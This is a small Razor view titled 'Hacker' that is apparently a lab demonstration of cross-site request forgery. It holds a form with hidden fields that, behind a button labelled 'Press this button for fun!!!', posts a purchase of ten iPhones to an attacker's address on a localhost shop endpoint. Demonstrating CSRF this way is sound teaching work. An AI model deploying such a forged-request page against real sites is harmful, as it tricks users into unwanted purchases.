
@{
    Layout = null;
}

<!DOCTYPE html>

<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>Hacker</title>
</head>
<body>
    <form action="http://localhost:57336/Principal/Buy" method="post">
        <input type="hidden" name="product" value="10 Iphones X 10.000" />
        <input type="hidden" name="address" value="The hackers house" />
        <button class="btn btn-success" type="submit">Press this button for fun!!!</button>
    </form>
</body>
</html>
